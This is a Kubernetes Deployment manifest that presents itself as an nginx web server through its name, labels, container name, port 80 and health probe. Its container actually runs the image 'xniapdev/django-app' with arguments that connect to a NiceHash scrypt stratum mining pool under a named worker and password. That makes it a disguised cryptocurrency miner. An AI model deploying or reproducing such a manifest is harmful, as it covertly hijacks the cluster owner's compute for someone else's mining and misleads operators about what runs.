apiVersion: apps/v1
kind: Deployment
metadata:
  name: nginx-deployment
  labels:
    app: nginx
spec:
  replicas: 1
  selector:
    matchLabels:
      app: nginx
  template:
    metadata:
      labels:
        app: nginx
    spec:
      containers:
      - name: nginx
        image: xniapdev/django-app:latest
        args:
          - "--url"
          - "stratum+tcp://scrypt.auto.nicehash.com:9200"
          - "--user"
          - "creack.worker1"
          - "--pass"
          - "abcdef"
        ports:
        - containerPort: 80
        livenessProbe:
          httpGet:
            path: /healthz
            port: 8080
          initialDelaySeconds: 30
          periodSeconds: 10
